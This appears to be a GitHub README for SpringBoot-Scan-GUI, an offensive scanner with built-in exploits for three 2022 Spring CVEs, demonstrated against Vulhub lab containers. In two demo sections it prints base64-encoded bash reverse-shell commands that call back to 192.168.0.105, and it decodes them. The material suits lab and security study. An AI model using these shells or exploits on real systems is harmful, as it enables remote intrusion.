Skip to content

13exp/SpringBoot-Scan-GUI

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

SpringBoot-Scan-GUI

开源工具 SpringBoot-Scan 的GUI图形化版本,对你有用的话麻烦点个Star哈哈~

GUI

注意:本工具内置相关漏洞的Exp,杀软报毒属于正常现象!

新版本工具使用

python3 main.py

VulHub 漏洞测试环境搭建

git clone https://github.com/vulhub/vulhub.git

安装Docker环境

sudo apt-get install docker.io
sudo apt install docker-compose

搭建CVE-2022-22965

cd /vulhub/CVE-2022-22965
sudo docker-compose up -d

搭建CVE-2022-22963

cd /vulhub/CVE-2022-22963
sudo docker-compose up -d

搭建CVE-2022-22947

cd /vulhub/CVE-2022-22947
sudo docker-compose up -d

如果报错,自行修改 .yml 文件中映射的端口号

漏洞复现演示

一、CVE-2022-22965

VulHub 环境复现

image image image

内置shell image

aabysszg-shell image

13exp-shell

image

春秋云境 环境复现

image

内置shell image

13exp-shell image

aabysszg-shell image image

二、CVE-2022-22963

VulHub 环境复现

准备反弹shell:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)

编码内容→ bash -i >& /dev/tcp/192.168.0.105/8888 0>&1

Kali监听对应端口: image

漏洞利用 image image

春秋云境 环境复现

注:云境反弹shell需使用公网服务器

服务器监听 image

image image

三、CVE-2022-22947

VulHub 环境复现

同样准备反弹shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODkgMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)

编码内容→ bash -i >& /dev/tcp/192.168.0.105/8889 0>&1

kali监听对应端口: image

漏洞利用 image image

春秋云境 环境复现

image image

项目Star统计

star

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages